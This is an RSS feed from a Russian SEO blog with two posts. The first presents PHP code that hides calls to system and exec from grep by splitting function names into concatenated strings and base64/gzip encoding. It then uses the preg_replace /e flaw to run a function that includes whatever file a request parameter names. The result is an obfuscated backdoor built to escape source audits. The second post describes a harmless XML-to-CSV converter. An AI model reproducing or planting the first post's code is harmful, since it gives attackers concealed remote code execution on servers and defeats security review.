Блог сео-студента » Мои скрипты http://seo-student.ru полезняшки :) Mon, 27 Jul 2009 13:31:29 +0000 en hourly 1 http://wordpress.org/?v=3.0.4 Замена eval() в php http://seo-student.ru/zamena-eval-v-php.html http://seo-student.ru/zamena-eval-v-php.html#comments Wed, 15 Jul 2009 20:20:18 +0000 сео студент http://seo-student.ru/?p=279 bobНедавно ломал голову над тем, есть ли замена функции eval() в php.

Задача: Сделать возможность вызова функций system, passthru, exec и т.д. так, чтобы в коде не было упоминания имен этих функций, то есть, чтобы при поиске по исходникам (grep -rl ‘function‘ /path) данные функции не светились.

Немного поломав мозг, пришел к такому решению:

// функции для выполнения
$funcs = array(
	'g'.'z'.'i'.'n'.'f'.'l'.'a'.'t'.'e',
	'b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e',
	'p'.'h'.'p'.'i'.'n'.'f'.'o'
);
 
$strng = 'KyhKLUtNAQA='; # прогнанный через gzinflate base64 хэш имени функции (preved)

function preved() {
############## Здесь любой код для выполнения ############
	(isset($_REQUEST['c'])) ? include($_REQUEST['c']) : die();
###########################################################
}
 
function test() {
		global $funcs, $strng;
		$result = $funcs[0]($funcs[1]($strng));
	return $result(); // заменить на $func[X], если не нужно вызывать функцию preved()
}
echo preg_replace("/123/e",test(),456);

Как видно из листинга, скрипт использует баг в функции preg_replace() с флагом /e. Разобраться с ним не сложно.
В результате получился скрипт, который может выполнять практически любые функции, кроме eval(), так как:

это языковая конструкция, а не функция, она не может вызываться при помощи переменных функций (c) мануал

Единственный минус – можно выполнить поиск по имени функции preg_replace(), но ее можно зашифровать аналогично примерам из скрипта или любым другим способом.

]]> http://seo-student.ru/zamena-eval-v-php.html/feed 1 Xml2csv Converter http://seo-student.ru/xml2csv-converter.html http://seo-student.ru/xml2csv-converter.html#comments Wed, 04 Feb 2009 00:26:55 +0000 сео студент http://seo-student.ru/?p=48 xml_to_csv_converterXml2csv - скрипт, который конвертирует файлы в формате XML в формат CSV (MS Excel).
Изначально скрипт был написан мной для конверта xml баз партнерки Sotmarket, но его так же успешно можно использовать и для других xml файлов. Достаточно лишь поместить их в директорию files, а затем выбрать из списка.

Пользоваться им предельно просто, ничего лишнего. Распишу по шагам:

Шаг 1

Просто жмем на ссылку «Скачать файлы с сервера» и ждем. Если у вас свои xml файлы, пропускаем этот шаг.

Шаг 1

Шаг 2

Когда у нас все закачалось, выбираем из списка нужный файл (можно выбрать все сразу) и жмем «Конверт».

Шаг 2

Получаем примерно такой результат:

Результат

Вот, собственно, и все. Теперь немного о том, как его натсроить. Открываем xml2csv.php, видим там строчки:

$folder = 'files'; // папка с файлами xml (нужны права на запись)
$delimiter = '^'; // разделитель для данных csv

Изменяем по вкусу и сохраняем. Вот и все настройки :)
Скрипт использует XPath язык запросов для работы с XML. Так же для работы скрипта необходимы права на запись в директорию, в которой лежит скрипт, в директорию files и необходимы права на удаленные соединения (не обязательно, если xml файлы вы закачиваете сами).
Писал на скорую руку, так что сильно не пинайте ;)

Скачать xml2csv converter

]]> http://seo-student.ru/xml2csv-converter.html/feed 7